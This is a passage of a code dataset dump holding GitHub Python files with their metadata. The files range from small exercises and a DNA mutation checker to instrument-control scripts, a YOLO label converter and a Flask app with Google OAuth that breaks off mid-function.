%d\\n')%(i+1,max(ls,rs),min(ls,rs)))\r\nbrStalls('C-small-1-attempt0.in')\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2627.py","file_name":"2627.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13482668946","text":"#function to ask user input x7 and return observations stored in a list\n\ndef observed():\n observations = []\n for count in range(7):\n print(\"Please enter an observation:\")\n observations.append(input())\n\n return observations\n\n\n#run the above function and collate the data into a set to then print iterations of each - stored in data\ndef run():\n print(\"Counting Observations:\")\n user_observation = observed()\n user_observation_set = set()\n for observation in user_observation:\n data = (observation, user_observation.count(observation))\n user_observation_set.add(data)\n for data in user_observation_set:\n print(f\"{data[0]} observed {data[1]} times!\")\n\nrun()\n#if entering more than 2 different observations, the print function will still 
work!\n","repo_name":"lawrencepj13/com728","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71406758595","text":"# coins.py\ndef coin_bag(n,coins):\n\tarr = [0]*(n+1)\n\tfor c in coins:\n\t\t# print(\"c =\",c)\n\t\tif c <= n: arr[c] += 1\t# can we use coin c at all?\n\n\t\tfor m in range(c,n+1):\n\t\t\t# Start at m = c to eliminate (>= 0) branch\n\t\t\t# print(\"\\tm =\",m)\n\t\t\t# print(\"\\t\\tlookback\",m-c,arr[m-c])\n\t\t\tarr[m] = arr[m] + arr[m-c]\n\n\tprint(arr)\n\treturn arr[n]\n\n\nprint(coin_bag(4,[1,2,3]))\nprint(coin_bag(10,[2,5,3,6]))\n","repo_name":"lh3nry/interview_prep","sub_path":"coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24041656012","text":"import numpy as np\n\n\nclass JTController:\n \"\"\"\n # Usage\n self.jt = JTController(self.skel)\n tau += self.jt.apply( [\"l_hand\", \"r_hand\"], f )\n \"\"\"\n def __init__(self, _skel):\n self.skel = _skel\n\n def apply(self, bodynames, f):\n if not isinstance(bodynames, list):\n bodynames = [bodynames]\n f = np.array(f)\n\n tau = np.zeros(self.skel.ndofs)\n for bodyname in bodynames:\n # J = self.skel.getBodyNodeWorldLinearJacobian(bodyname)\n J = self.skel.body(bodyname).world_linear_jacobian()\n JT = np.transpose(J)\n tau += JT.dot(f)\n return tau\n","repo_name":"sehoonha/pydart","sub_path":"apps/bipedJump/jacobian_transpose.py","file_name":"jacobian_transpose.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"37259745727","text":"import requests, pickle\r\nfrom xml.etree import ElementTree\r\nfrom hide import URL\r\n\r\nclass DataController:\r\n def __init__(self):\r\n self.recycles = []\r\n\r\n # parsing한 data를 각각 dict타입으로 묶은 후 모든 data를 list형태로 저장\r\n def parsingData(self):\r\n response = requests.get(URL)\r\n print(response.status_code)\r\n xmlStr = response.text\r\n root = ElementTree.fromstring(xmlStr)\r\n allItems = root.iter('item')\r\n for item in allItems:\r\n recycleDict = {}\r\n recycleDict['name'] = item.find(\"dicItemNM\").text\r\n recycleDict['dump'] = item.find(\"outMeth\").text\r\n self.recycles.append(recycleDict)\r\n\r\n def saveData(self, DATA):\r\n with open(\"recycle.dat\", \"wb\") as f:\r\n pickle.dump(DATA, f, pickle.HIGHEST_PROTOCOL)\r\n\r\n def loadData(self):\r\n with open(\"recycle.dat\", \"rb\") as f:\r\n datas = pickle.load(f)\r\n return datas\r\n","repo_name":"stich9208/SWP2_AD","sub_path":"ADproject/dataController.py","file_name":"dataController.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4455023633","text":"import random\n\ndef tas_kagit_makas(): # tas_kagit_makas() adında bir fonksiyon tanımlandı\n secenekler = [\"Taş\", \"Kağıt\", \"Makas\"] # secenekler adında bir liste oluşturuldu\n\n while True: # sonsuz döngü\n print(\"1. Taş\")\n print(\"2. Kağıt\")\n print(\"3. Makas\")\n print(\"4. Çıkış\")\n\n secim = int(input(\"Seçiminizi girinizç. 
(1-3): \")) # kullanıcıdan seçim alındı\n\n if secim == 4: # eğer 4'e eşitse\n print(\"Çıkış yapılıyor...\")\n break # program durduruldu\n\n elif secim in [1, 2, 3]:\n bilgisiyar_secim = random.choice(secenekler) # bilgisiyardan rastgele seçenek alınır\n kullanici_secim = secenekler[secim - 1] # kullanıcıdan seçenek alınır \n\n print(f\"Siz: {kullanici_secim} / Bilgisiyar: {bilgisiyar_secim}\") # ekrana yazdırılır\n\n if kullanici_secim == bilgisiyar_secim: \n print(\"Berabere!\")\n elif (kullanici_secim == \"Taş\" and bilgisiyar_secim == \"Makas\") or \\\n (kullanici_secim == \"Kağıt\" and bilgisiyar_secim == \"Taş\") or \\\n (kullanici_secim == \"Makas\" and bilgisiyar_secim == \"Kağıt\"):\n print(\"Tebrikler kazandınız :) \")\n else:\n print(\"Bilgisayar kazandı!\")\n else:\n print(\"Geçersiz seçim. Tekrar deneyin.\")\n\ntas_kagit_makas()","repo_name":"HakanAknc/Python_mini_projects","sub_path":"TemelSorular/TasKagitMakasOyunu.py","file_name":"TasKagitMakasOyunu.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23184417568","text":"import numpy as np\nimport timeit\n\ndef checkDna(dnaStrip):\n mutantChains = [\"AAAA\",\"CCCC\",\"GGGG\",\"TTTT\"]\n mutationsCount=0\n for mutantChain in mutantChains:\n if mutantChain in dnaStrip:\n mutationsCount+=dnaStrip.count(mutantChain)\n if mutationsCount>1:\n break\n\n return mutationsCount\n\ndef isMutant(dna):\n\n mutations = 0\n ticInit=timeit.default_timer()\n for dnaRow in dna:\n mutations+= checkDna(dnaRow)\n if mutations>1:\n print('1st loop time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return True\n print('1st loop time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n\n tic=timeit.default_timer()\n dnaMatrix = np.array([list(row.encode()) for row in dna])\n print('Matrix generation: ',(timeit.default_timer()-tic)*1000,'ms')\n\n tic=timeit.default_timer()\n dnaMatrixT = dnaMatrix.T\n for column in dnaMatrixT:\n dnaColumn = bytes(column.tolist()).decode()\n mutations+= checkDna(dnaColumn)\n if mutations>1:\n print('2nd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return True\n print('2nd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n\n tic=timeit.default_timer()\n dnaMatrixF = np.fliplr(dnaMatrix)\n lenRow=len(dna)\n for offset in range(-lenRow+4,lenRow-3):\n dnaDiagonal = bytes(np.diagonal(dnaMatrix,offset).tolist()).decode()\n dnaDiagonalF = bytes(np.diagonal(dnaMatrixF,offset).tolist()).decode()\n mutations+= checkDna(dnaDiagonal + \" \" + dnaDiagonalF)\n if mutations>1:\n print('3rd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return True\n print('3rd loop time: ',(timeit.default_timer()-tic)*1000,'ms')\n print('Total time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n return False\n\ndef dnaGenerator(size,noMutant=False):\n dna=[]\n dnaStrings=['A','C','G','T']\n if noMutant:\n dnaStrings=['Z','Y','X','W']\n for index in range(size):\n dna.append(\"\".join([dnaStrings[np.random.randint(0,len(dnaStrings))] for i in range(size)]))\n return dna\n\nmutantDna = [\"ATGCGA\",\"CAGTGC\",\"TTATGT\",\"AGAAGG\",\"CCCCTA\",\"TCACTG\"]\nnormalDna = [\"ATGCGA\",\"CAGTGC\",\"TTATTT\",\"AGACGG\",\"GCGTCA\",\"TCACTG\"]\nprint('isMutant?: ', isMutant(mutantDna))\nprint('isMutant?: ', 
isMutant(normalDna))\n\nrandomDna=dnaGenerator(100,True)\nticInit=timeit.default_timer()\nprint('isMutant? (dnaGenerator): ',isMutant(randomDna))\nprint('Total main time: ',(timeit.default_timer()-ticInit)*1000,'ms')\n","repo_name":"jfmatheusg/magneto","sub_path":"mutant.py","file_name":"mutant.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39482237121","text":"import numpy as np\nimport numpy.random as npr\nimport StanfordTrees as st\nimport LNLayers as lnl\nimport LayerNets as ln\nimport random as random\nfrom time import clock\nfrom sys import stdout as stdout\n\ndef simple_stb_test(tree_dir='./trees'):\n    stb_data = st.SimpleLoad(tree_dir)\n    return\n\nif __name__ == '__main__':\n    tree_dir = './trees'\n    stb_data = st.SimpleLoad(tree_dir)\n    max_lut_idx = max(stb_data['lut_keys'].values())\n    basic_opts = {}\n    basic_opts['class_count'] = 5\n    lut_opts = {}\n    lut_opts['max_key'] = max_lut_idx\n    lut_opts['embed_dim'] = 30\n    lut_opts['max_norm'] = 2.0\n    basic_opts['lut_layer'] = lut_opts\n\n    # Initialize a network\n    KMN = ln.KMaxNet(basic_opts)\n    KMN.init_weights(w_scale=0.05, b_shift=0.1)\n\n    # Get a \"flattened\" list of training phrases and classes\n    train_phrases = []\n    train_labels = []\n    for (phrases, labels) in zip(stb_data['train_phrases'], stb_data['train_labels']):\n        train_phrases.extend(phrases)\n        train_labels.extend(labels)\n\n    batch_size = 50\n    epoch_batches = 2500\n    learn_rate = 0.01\n    train_pairs = [(phrase, label) for (phrase, label) in zip(train_phrases, train_labels)]\n    train_phrases = []\n    train_labels = []\n    for e in range(500):\n        print(\"Starting epoch {0:d}, {1:d} batches\".format(e, len(train_pairs)//batch_size))\n        stdout.flush()\n        # Reset batch extraction indices and completed batch counter\n        batch_start = 0\n        batch_end = batch_start + batch_size\n        completed_batches = 0\n        # Perform batch updates for the current epoch\n        L = 0.0\n        acc = 0.0\n        t1 = clock()\n        random.shuffle(train_pairs)\n        if ((e % 5) == 0):\n            KMN.reset_moms(ada_init=0.0, clear_moms=False)\n        while ((batch_end < len(train_pairs)) and (completed_batches < epoch_batches)):\n            # Extract the current training phrase/label batch\n            batch_pairs = train_pairs[batch_start:batch_end]\n            # Train on this batch, and count its completion\n            Xb = [pair[0] for pair in batch_pairs]\n            Yb = [pair[1] for pair in batch_pairs]\n            res = KMN.process_training_batch(Xb, Yb, learn_rate, use_dropout=True)\n            L += res[0]\n            acc += res[1]\n            completed_batches += 1\n            # Advance batch extraction indices\n            batch_start = batch_start + batch_size\n            batch_end = batch_start + batch_size\n            # Print diagnostic info from time-to-time\n            if ((completed_batches % 50) == 0):\n                print(\"completed {0:d} updates, with loss {1:.4f} and acc {2:.4f}\".format( \\\n                    completed_batches, (L / 50.0), (acc / 50.0)))\n                L = 0.0\n                acc = 0.0\n                t2 = clock()\n                print(\"-- time: {0:.2f}\".format(t2-t1))\n                t1 = clock()\n                stdout.flush()\n\n\n\n##############\n# EYE BUFFER #\n##############\n","repo_name":"Philip-Bachman/NN-Python","sub_path":"nlp/nlp_convnet/STBTests.py","file_name":"STBTests.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"5255613236","text":"import pandas as pd\nimport numpy as np\n\n# An Index is an immutable ndarray implementing an ordered sliceable set.\n# The basic object for storing axis labels for all pandas objects\nindex = 
pd.date_range('1/1/2000', periods=8)\n\n# A series is a 1D ndarray with axis labels. The labels need not be unique\n# but must be hashable. The object supports both integer and label indexing.\n# 100 x 1 series of random numbers\nlong_series = pd.Series(np.random.randn(100))\nls = long_series.array # Get the data in a list-like array\n\n# A Dataframe is a 2D, size-mutable, potentially heterogeneous tabular data\n# structure with labeled axes (rows and columns). Can be thought of as a\n# dict-like container for Series objects\n# 5 x 5 table of random numbers\nsmall_df = pd.DataFrame(np.random.randn(5, 5))\n\n# TYPICALLY ALL PANDAS FUNCTIONS RETURN A NEW DATAFRAME, RATHER THAN APPLYING\n# THE FUNCTIONALITY IN SITU - INPLACE TYPICALLY FORCES THE ACTION TO HAPPEN\n# TO THE DATAFRAME ITSELF\n\nprint(pd.MultiIndex.from_tuples([(1, 'a'), (1, 'b'), (1, 'c'), (2, 'a')],\n                                names=['1st', '2nd']))\n\nsmall_df.mean(0) # Will calculate the mean of all the columns\nsmall_df.mean(1) # \" \" \" rows\nsmall_df.idxmin(axis=0, skipna=True) # Calculates index of smallest value\n# in each column, skipping NaNs\n\nrn = small_df.rename(columns={0: 'Zero', 1: 'One'}) # Rename two of the\n# columns\nprint(rn.drop([\"Zero\"], axis=1)) # Drop the zero'th column\n","repo_name":"mattingram0/AdvancedResearchProject","sub_path":"tutorials/pandas2.py","file_name":"pandas2.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30056840393","text":"import logging\nfrom osgeo import gdal\n\n\ndef create_empty(fname, inp_proj, clear_img=False):\n    \"\"\"\n    Create an empty geoTiff-image based on metadata from another geoTiff image. Metadata could be obtained by method\n    get_projection().\n    :param fname: Full path to new created image\n    :param inp_proj: Projection dictionary metadata from another geoTiff image\n    :param clear_img: If True, fill new image by 0 (spends much more time). 
Default is False.\n :return:\n \"\"\"\n driver = gdal.GetDriverByName('GTiff')\n\n outfn = fname\n dtype = gdal.GDT_Byte\n inp_shape = inp_proj['shape']\n nbands = 4\n nodata = 255\n\n ds = driver.Create(outfn, inp_shape[1], inp_shape[0], nbands, dtype, options=['COMPRESS=LZW', 'TILED=YES'])\n ds.SetProjection(inp_proj['projection'])\n ds.SetGeoTransform(inp_proj['geotransform'])\n\n if clear_img:\n for i in range(nbands):\n ds.GetRasterBand(1+i).Fill(0)\n ds.GetRasterBand(1+i).SetNoDataValue(nodata)\n ds.FlushCache()\n\n del ds # close file\n\n\ndef put_into_image(fname, start_xy, bgra):\n \"\"\"\n Put into already created geoTiff image BGRA patch by specific XY-position.\n :param fname: Full path to existing geoTiff image\n :param start_xy: X/Y pixel position where patch will be placed\n :param bgra: BGRA (8-bit per channel)\n :return:\n \"\"\"\n rgba = [2, 1, 0, 3]\n ds = gdal.Open(fname, gdal.GA_Update)\n for band_ind in range(4):\n out_band = ds.GetRasterBand(band_ind + 1)\n # GDAL operate with bands first dim\n out_band.WriteArray(bgra[..., rgba[band_ind]], xoff=int(start_xy[0]), yoff=int(start_xy[1]))\n\n del ds # close file\n\n\ndef get_projection(inp):\n dataset = gdal.Open(inp)\n if dataset is None:\n logging.error('Unable to open {}'.format(inp))\n return None\n\n projection = dataset.GetProjection()\n geotransform = dataset.GetGeoTransform()\n\n if projection is None and geotransform is None:\n logging.error('No projection or geotransform found on file {}'.format(inp))\n return None\n\n gcp_count = dataset.GetGCPCount()\n gcps = dataset.GetGCPs()\n gcp_proj = dataset.GetGCPProjection()\n\n del dataset\n\n result = dict()\n result['projection'] = projection\n result['geotransform'] = geotransform\n result['gcp_count'] = gcp_count\n result['gcps'] = gcps\n result['gcp_proj'] = gcp_proj\n\n return result\n\n\ndef apply_projection(inp_proj, output):\n dataset2 = gdal.Open(output, gdal.GA_Update)\n\n if dataset2 is None:\n logging.error('Unable to open {}'.format(output))\n return -1\n\n geotransform = inp_proj['geotransform']\n projection = inp_proj['projection']\n gcp_count = inp_proj['gcp_count']\n gcps = inp_proj['gcps']\n gcp_proj = inp_proj['gcp_proj']\n\n if geotransform is not None and geotransform != (0, 1, 0, 0, 0, 1):\n dataset2.SetGeoTransform(geotransform)\n\n if projection is not None and projection != '':\n dataset2.SetProjection(projection)\n\n if gcp_count != 0:\n dataset2.SetGCPs(gcps, gcp_proj)\n\n del dataset2\n\n return 0\n\n\ndef copy_projection(inp, output):\n src_projection = get_projection(inp)\n\n if src_projection is None:\n return -1\n\n ret_code = apply_projection(src_projection, output)\n\n return ret_code\n\n\ndef create_tiles(args):\n from .gdal2tiles import GDAL2Tiles\n\n err_code = 0\n argv = gdal.GeneralCmdLineProcessor(args)\n try:\n if argv:\n gdal2tiles = GDAL2Tiles(argv[1:])\n gdal2tiles.process()\n except Exception:\n err_code = -1\n\n return err_code\n","repo_name":"oradzhabov/bigimage","sub_path":"tools/gdalcopyproj.py","file_name":"gdalcopyproj.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31231294268","text":"from test import app\nimport pytest\nimport re\nimport json\n\n@pytest.fixture\ndef client(request):\n client = app.test_client()\n\n return client\n\ndef test_virtual_alias_post(client):\n rv = client.post('/virtualhostalias')\n # This request should return error with no data\n error_regex = re.compile(\"(ERROR)\")\n assert 
error_regex.search(rv.data) is not None\n assert rv._status_code == 400\n\n # Let's try the POST with some data\n data = {'name':'test'}\n rv = client.post('/virtualhostalias', data=json.dumps(data), content_type='application/json')\n assert rv._status_code == 201\n assert 'test' in rv.data\n\ndef test_virtual_alias_index(client):\n rv = client.get('/virtualhostalias')\n assert rv._status_code == 200\n\n assert rv.headers[0] == ('Content-Type', 'application/json')\n assert 'test' in rv.data\n assert '_id' in rv.data\n","repo_name":"AltCtrlSupr/acs-nginx-api","sub_path":"tests/test_virtualalias.py","file_name":"test_virtualalias.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72459212673","text":"\"\"\"\n 实现效果:将YOLOv5中detect出来的结果进行转换\n 原格式:一张图片对应一个同名txt,txt中存储检测结果\n 例如:3610.jpg --> labels/3610.txt(3610.txt中共有316行),3611.jpg --> labels/3611.txt(3611.txt中共有30行)\n 3610.txt : 0 0.480452 0.509121 0.0191138 0.029316 -----\n 0 0.884883 0.468404 0.0199826 0.0221498 |\n 0 0.306907 0.471661 0.016073 0.0273616 |——> 316行\n ... |\n 0 0.388575 0.421498 0.00825369 0.0169381 -----\n\n 3611.txt : 0 0.77725 0.36475 0.00483333 0.008 -----\n 0 0.830083 0.365375 0.00516667 0.00925 |\n 0 0.679583 0.398125 0.00516667 0.00875 |——> 30行\n ... |\n 0 0.524917 0.441375 0.00616667 0.01075 -----\n\n 转换后:只有一个detectResult.txt,一行存放一张图片的检测结果\n 例如: detectResult.txt : 3610 316\n 3611 30\n ...\n\"\"\"\n\nimport os\n\n# 字体颜色控制\nred_begin = '\\033[1;31;40m'\ngreen_begin = '\\033[1;32;40m'\nyellow_begin = '\\033[1;33;40m'\nblue_begin = '\\033[1;34;40m'\ncolor_end = '\\033[0m'\n\n\n# 获取指定文件夹下的所有文件名\ndef get_file_name(path):\n file_name = os.listdir(path)\n return file_name\n\n\n# 获取所有检测文件的名字\ndef get_files_name(path, file_suffixs):\n files = get_file_name(path)\n # 整理文件,删除后缀\n files = [file.split('.')[0] for file in files if file.split('.')[1] in file_suffixs]\n # 将图片按名字排好序\n files.sort()\n print(f'-- {blue_begin} the number of files : {color_end} {len(files)}')\n print(f'-- files : {files} ')\n return files\n\n\ndef get_labels(path, imgs_name):\n labels = {}\n for name in imgs_name:\n labels_path = f'{path}/{name}.txt'\n if os.path.exists(labels_path):\n with open(labels_path, 'r') as f:\n labels[name] = len(f.readlines())\n f.close()\n else:\n labels[name] = 0\n\n print(f'-- {blue_begin} labels : {color_end} {labels}')\n return labels\n\n\ndef save_file(path, content):\n with open(path, 'w') as f:\n f.write(content)\n print(f'-- 写入成功')\n f.close()\n\n\ndef save_labels(path, labels):\n content = \"\"\n for name in labels.keys():\n content = f'{content}{name} {labels[name]}\\n'\n save_file(path, content)\n\n\ndef detect_result(file_from_path, file_suffixs, label_from_path, label_to_path, result_save_file):\n # 获取所有检测文件的名字\n files_name = get_files_name(file_from_path, file_suffixs)\n # 读取检测结果\n labels = get_labels(label_from_path, files_name)\n # 保存检测结果\n save_labels(f'{label_to_path}/{result_save_file}', labels)\n return files_name, labels\n\n\ndef get_detect_result(file_from_path, file_suffixs, label_from_path, label_to_path, result_save_file):\n # 获取所有检测文件的名字\n files_name = get_files_name(file_from_path, file_suffixs)\n # 读取检测结果\n labels = get_labels(label_from_path, files_name)\n return files_name, labels\n\n# 入口函数\ndef main():\n # 路径设置\n result_save_file = 'detectResult.txt'\n img_from_path = '检测图片的路径'\n label_from_path = f'检测结果标签存放路径'\n label_to_path = f'最后结果文件存放处'\n suffixs = ['jpg', 'png', 'jpeg', 'gif', 'bmp'] # 
待检测文件的后缀list\n detect_result(img_from_path, suffixs, label_from_path, label_to_path, result_save_file)\n\n\n# 测试性能专用函数\ndef test():\n print('Test time.\\n')\n labels_name = ['111.jpg', '22.png', '36.jpg']\n suffix = ['png', 'jpg', 'jpeg', 'bmp']\n print([name.split('.')[0] for name in labels_name if name.split('.')[1] in suffix])\n\n\nif __name__ == '__main__':\n main()\n # test()\n","repo_name":"cxmmaycxm/yolov5CommonTools","sub_path":"yoloDetectResult.py","file_name":"yoloDetectResult.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74374519235","text":"import pyvisa\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import interp1d\nimport time\n\ndef get_s21(fstart, fstop, subscanbw, num_points, kidpower, ifbw):\n bfout, bfin, rfout = power_calibration()\n\n totscanbw = fstop - fstart\n num_subscans = int(np.ceil(totscanbw / subscanbw))\n realfstart = fstart\n realfstop = fstart + num_subscans * subscanbw\n f0start = realfstart + subscanbw / 2\n freqs = np.linspace(realfstart, realfstop, num_points*num_subscans)\n scans = []\n # Connect with VI's\n vna = connect2vi(\"GPIB0::16::INSTR\", timeout=3000000)\n weinschell = connect2vi(\"GPIB0::10::INSTR\", timeout=300000)\n # Initialize VNA\n init_vna(vna)\n for i in range(num_subscans):\n f0 = f0start + i*subscanbw\n if i == 0:\n KID_cryoOUt = bfout(f0)\n GainRFbox = rfout(f0)\n PcryoOUt = kidpower + KID_cryoOUt + GainRFbox\n PVNAin = PcryoOUt - 2\n if PVNAin > 62:\n att = 62\n elif PVNAin < 2:\n att = 2\n else:\n att = PVNAin\n att = np.round(att / 2) * 2\n set_weinschell(weinschell, att)\n KID_cryoIn = bfin(f0)\n vna_power = kidpower - KID_cryoIn\n subscan = vna_scan(vna, f0, subscanbw, num_points, vna_power, ifbw, i)\n scans.append(subscan)\n s21 = np.array(scans).flatten()\n print('S21 completed')\n vna.close()\n weinschell.close()\n return freqs, s21\n\n\ndef power_calibration():\n BFout = np.load('calibration files/BFout.npy')\n BFin = np.load('calibration files/BFin.npy')\n RFout = np.load('calibration files/RFout.npy')\n bfout = interp1d(BFout[:, 0], BFout[:, 1])\n bfin = interp1d(BFin[:, 0], BFin[:, 1])\n rfout = interp1d(RFout[:, 0], RFout[:, 1])\n return bfout, bfin, rfout\n\ndef connect2vi(VISA, timeout=300000):\n rm = pyvisa.ResourceManager() \n vi = rm.open_resource(VISA)\n vi.timeout = timeout\n try:\n vi.query('*IDN?')\n except:\n print('Could not connect to VI')\n return vi\n\ndef init_vna(vna):\n vna.write(f'SYST:PRES')\n vna.write(f'CONT:AUX:OUTP2:VOLT 0')\n vna.write(f'CONT:AUX:OUTP1:VOLT 5')\n \n vna.write('OUTP ON')\n # vna.write('MMEMORY:LOAD \"D:\\KIDS\\KIDs.csa\";')\n vna.query(f'*OPC?')\n vna.write('SENS1:SWE:TRIG:POIN OFF;')\n vna.write('TRIG:SCOP CURR;')\n vna.write('INIT1:CONT ON;')\n\ndef vna_scan(vna, f0, subscanbw, num_points, vna_power, ifbw, id):\n\n # Set sweep params\n session = 'Scan%d' % id\n vna.write(f'DISP:WIND:TRAC1:DEL;')\n vna.write(f'CALC1:PAR:DEF \"{session}\", S21;')\n vna.write(f'CALC1:PAR:SEL \"{session}\";')\n vna.write(f'DISP:WIND:TRAC1:FEED \"{session}\";') \n vna.write(f'DISP:WIND:TRAC1:Y:AUTO')\n vna.write(f'SENS1:FREQ:CENT {f0}GHz;')\n vna.write(f'SENS1:FREQ:SPAN {subscanbw}GHz;')\n vna.write(f'SOUR1:POW1:LEV {vna_power};')\n vna.write(f'SENS1:BWID {ifbw}Hz;')\n vna.write(f'SENS1:SWE:POIN {num_points};') \n vna.write(f'MMEM:STOR:TRAC:FORM:SNP DB;')\n vna.write('FORM:DATA ASCII;')\n vna.write(f'sens1:swe:trig:poin off;')\n vna.write(f'sens1:swe:time:auto 
on;') \n    vna.write(f'TRIG:SOUR MAN;')\n    vna.write(f'INIT:CONT OFF;')\n    power = float(vna.query(f'SOUR1:POW1:LEV?'))\n    print('VNA power = %.2f' % power)\n    \n    # Trigger a single sweep\n    vna.write(f'TRIG:SCOP CURR;')\n    vna.write(f'INIT:IMM;')\n    if vna.query('*OPC?'):\n        response = vna.query_ascii_values(f'CALC1:DATA? FDATA;')\n        s21 = np.array(response)\n    if vna.query(f'*OPC?'):\n        print('Subscan %d complete' % (id))\n    \n    return s21\n\n\ndef set_weinschell(weinschell, attn):\n    attn_chan2 = 2\n    weinschell.write(f'CHAN1;ATTN {attn}')\n    weinschell.write(f'CHAN2;ATTN {attn_chan2}')\n    \n\ndef plot_s21(freqs, s21):\n    fig, ax = plt.subplots()\n    _ = ax.plot(freqs, s21, lw=0.2)\n    ax.set_xlim([np.amin(freqs), np.amax(freqs)])\n    ax.set_xlabel('F [GHz]')\n    ax.set_ylabel('|$S_{21}$| [dB]')\n    ax.set_title('S21 from VNA')\n    ax.grid(which='Major')\n    plt.show()\n\n\n\n# run\n# st = time.time()\n# freqs, s21 = get_s21(4, 6, 0.1, 3201, -110, 1000)\n# et = time.time()\n# elapsed_time = et - st\n# print('Elapsed time = %d seconds' % elapsed_time)\n# plot_s21(freqs, s21)\n","repo_name":"wilbertras/spatial-mapping","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44165325371","text":"# test\n\nfrom datetime import datetime\nfrom os.path import isfile\nfrom os.path import join\n\nfrom flask import *\nfrom flask_caching import Cache\nfrom flask_socketio import SocketIO, send\nfrom authlib.integrations.flask_client import OAuth\nimport json\nimport markdown\n\nfrom content import load_content\nfrom firebase.article import upload_article\nimport g_auth\n\nif not isfile('.env'):\n    print(\n        'WARN: Missing .env file, please add a .env file in your root directory.'\n    )\n\ncontent = load_content(\"content.yml\")\nearlyaccess = False\nARTICLE_MIN = 2000\nARTICLE_MAX = 30000\n\n# firebase imports (should be done after dotenv validation)\nfrom firebase import user as fbuser\nfrom firebase import tools as fbtools\nfrom firebase import paginate\nfrom firebase import search as fbsearch\nfrom firebase import article as fbarticle\n\napp = Flask(__name__, template_folder='src')\napp.config['TEMPLATES_AUTO_RELOAD'] = True\napp.config['FLASK_ENV'] = 'development'\napp.config['DEBUG'] = True\napp.config['CACHE_TYPE'] = 'SimpleCache'\napp.config['CACHE_DEFAULT_TIMEOUT'] = 1800\napp.secret_key = g_auth.secret_key\n\nsio = SocketIO(app, debug=True, threaded=True)\noauth = OAuth(app)\n\ngoogle = oauth.register(**g_auth.config)\n\nCATS = {}\n\nwith open('cats.json') as f:\n    CATS = json.load(f)\n\n\ndef md_html(md_str):\n    # use the markdown module's render function; a bare `from markdown import markdown`\n    # would be shadowed by the `import markdown` above and crash at call time\n    return markdown.markdown(md_str)\n\n\n@app.context_processor\ndef utility_processor():\n    def is_signed_in():\n        return fbuser.is_signed_in()\n\n    def current_pfp():\n        try:\n            return fbtools.get_doc(u'users', fbuser.current_uid())['pfp']\n        except Exception:\n            return ''\n\n    def user_elevations():\n        try:\n            return fbtools.get_doc(u'users', fbuser.current_uid())['elevation']\n        except Exception:\n            return []\n\n    def authorized(level, uid=fbuser.current_uid()):\n        try:\n            return fbtools.isauthorized(level, uid)\n        except Exception:\n            return False\n\n    def c_user():\n        try:\n            return fbtools.get_doc(u'users', fbuser.current_uid())\n        except Exception:\n            return None\n\n    def unix_time(time):\n        return datetime.fromtimestamp(time).strftime('%d/%m/%Y')\n\n    def cats():\n        return CATS\n    \n    def md(m):\n        return markdown.markdown(m)\n\n    return dict(is_signed_in=is_signed_in,\n                
current_pfp=current_pfp,\n                user_elevations=user_elevations,\n                authorized=authorized,\n                c_user=c_user,\n                unix_time=unix_time,\n                cats=cats,\n                md=md)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n    try:\n        subpage = request.args.get('goto') if earlyaccess is not True else None\n        init_pagi = paginate.paginate('articles', 'timestamp', l=5, o='DESC')\n        for i in init_pagi['data'][1:]:\n            i['body'] = i['body'].strip().replace(\"\\n\",\n                                                  \"\")[:150].rsplit(' ', 1)[0]\n        return render_template('./screens/index.html',\n                               subpage=subpage,\n                               h=init_pagi)\n    except Exception as e:\n        return f\"Something went wrong: {e}\"\n\n\n@app.route('/greet')\ndef greet():\n    return dict(session)['profile']\n\n\n@app.route('/login/google')\ndef google_auth():\n    google = oauth.create_client('google')\n    redirect_uri = url_for('authorize', _external=True)\n    return google.authorize_redirect(redirect_uri)\n\n\n@app.route('/authorize')\ndef authorize():\n    google = oauth.create_client('google')\n    token = google.authorize_access_token()\n    resp = google.get('userinfo')\n    user_info = resp.json()\n    user = oauth.google.userinfo()\n    session['profile'] = user_info\n    session.permanent = True\n    